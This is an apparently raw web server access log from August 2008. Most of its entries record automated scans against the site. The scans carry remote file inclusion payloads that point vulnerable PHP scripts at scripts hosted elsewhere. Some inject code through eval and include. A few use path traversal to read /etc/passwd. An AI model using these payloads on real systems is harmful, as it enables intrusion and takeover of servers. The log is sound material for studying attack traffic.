204.15.10.22 - - [18/Aug/2008:09:53:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
204.15.10.22 - - [18/Aug/2008:09:53:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://makemoneymania.info/.../rid??? HTTP/1.1" 200 3711 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
80.237.132.23 - - [18/Aug/2008:09:53:20 -0700] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:53:28 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:53:29 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:53:29 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.240.164.232 - - [18/Aug/2008:09:53:43 -0700] "GET /logs/access_080522.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:09:53:45 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:09:53:46 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.48.106 - - [18/Aug/2008:09:53:50 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.12.15.28 - - [18/Aug/2008:09:54:27 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.realschuleochtrup.de//components/com_simpleboard/id-x3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
85.12.15.28 - - [18/Aug/2008:09:54:27 -0700] "GET /phphtml.php?htmlclass_path=http://www.realschuleochtrup.de//components/com_simpleboard/id-x3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:54:43 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.101.192.223 - - [18/Aug/2008:09:54:47 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alwayskl.iespana.es/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.240.164.232 - - [18/Aug/2008:09:54:47 -0700] "GET /logs/access_080614.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:55:02 -0700] "GET /logs/access_080517.log//include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:09:55:03 -0700] "GET /logs/access_080517.log//include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:55:36 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:55:37 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:09:55:53 -0700] "GET /logs/access_080602.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:55:58 -0700] "GET /logs/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:55:59 -0700] "GET /logs/access_080630.log/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:55:59 -0700] "GET /index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 200 10952 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:55:59 -0700] "GET /logs/access_080324.log/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.14.46.18 - - [18/Aug/2008:09:56:17 -0700] "GET //admin.php?DOCUMENT_ROOT=http://inegol.uludag.edu.tr/index/forum/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [18/Aug/2008:09:56:17 -0700] "GET /logs//admin.php?DOCUMENT_ROOT=http://inegol.uludag.edu.tr/index/forum/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.240.164.232 - - [18/Aug/2008:09:56:18 -0700] "GET /logs/access_080522.log/errors.php?error=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:56:25 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:09:56:26 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:09:56:26 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:56:26 -0700] "GET //index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 200 10971 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:56:30 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:56:30 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:56:33 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:56:38 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:56:38 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:56:39 -0700] "GET //index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 200 10955 "-" "libwww-perl/5.803" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:56:46 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:56:47 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:56:47 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.240.164.232 - - [18/Aug/2008:09:56:55 -0700] "GET /logs/access_080614.log/errors.php?error=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:09:57:11 -0700] "GET /logs/access_080410.log/index.php?canal=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:09:57:13 -0700] "GET /logs/access_080808.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:09:57:13 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.222.144 - - [18/Aug/2008:09:57:14 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:09:57:16 -0700] "GET /logs/index.php?canal=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:09:57:17 -0700] "GET /index.php?canal=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 11008 "-" "libwww-perl/5.808" "www.dmulk.com"
76.9.3.130 - - [18/Aug/2008:09:57:23 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [18/Aug/2008:09:57:23 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [18/Aug/2008:09:57:23 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [18/Aug/2008:09:57:23 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:57:28 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:57:30 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:57:32 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:57:33 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:57:35 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:57:37 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:57:40 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:09:57:40 -0700] "GET /logs/access_070823.log HTTP/1.0" 200 56843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:57:40 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.129.240.226 - - [18/Aug/2008:09:57:40 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:57:45 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:57:45 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:57:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:09:57:51 -0700] "GET /logs/access_080303.log/index.php?canal=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:09:57:54 -0700] "GET /logs/access_080313.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:58:13 -0700] "GET /logs//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:58:14 -0700] "GET //sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:58:17 -0700] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [18/Aug/2008:09:58:27 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [18/Aug/2008:09:58:27 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:58:29 -0700] "GET /logs/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:58:30 -0700] "GET /index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 200 10936 "-" "libwww-perl/5.803" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:58:34 -0700] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:58:35 -0700] "GET /logs/access_080708.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:58:36 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.110.190.171 - - [18/Aug/2008:09:58:36 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:58:38 -0700] "GET /logs/access_080630.log/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:09:58:40 -0700] "GET /logs//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.77.155 - - [18/Aug/2008:09:58:41 -0700] "GET //cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:58:45 -0700] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:09:58:55 -0700] "GET /logs//modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.96.134 - - [18/Aug/2008:09:58:55 -0700] "GET //modules/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:09:59:15 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:09:59:23 -0700] "GET /logs/access_080324.log/index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:00:53 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:00:58 -0700] "GET //include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:01:07 -0700] "GET /logs//include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:01:07 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:01:07 -0700] "GET //include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:01:07 -0700] "GET /logs/access_080108.log//include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [18/Aug/2008:10:01:11 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [18/Aug/2008:10:01:11 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:01:13 -0700] "GET /logs//include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:10:02:03 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:10:02:09 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:10:02:09 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:10:02:10 -0700] "GET //index.php?DOCUMENT_ROOT=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 200 10971 "-" "libwww-perl/5.803" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:02:11 -0700] "GET //include/write.php?dir=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:02:11 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:02:12 -0700] "GET /logs//include/write.php?dir=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.9.3.130 - - [18/Aug/2008:10:02:27 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.19.47.160 - - [18/Aug/2008:10:03:30 -0700] "GET /index.php?body=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 200 10952 "-" "libwww-perl/5.803" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:03:35 -0700] "GET /logs//include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:03:35 -0700] "GET //include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:03:38 -0700] "GET /logs//include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:10:03:38 -0700] "GET //include/write.php?dir=http://sibtorg.com/shop/usr/extensions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.130 - - [18/Aug/2008:10:03:49 -0700] "GET /logs//include/write.php?dir=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.130 - - [18/Aug/2008:10:03:49 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.130 - - [18/Aug/2008:10:03:49 -0700] "GET //include/write.php?dir=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.11 - - [18/Aug/2008:10:03:55 -0700] "GET /logs/access_080517.log//include/write.php?dir=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.230.130 - - [18/Aug/2008:10:04:02 -0700] "GET /logs/access_080517.log//include/write.php?dir=http://tokihasanaga.com/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
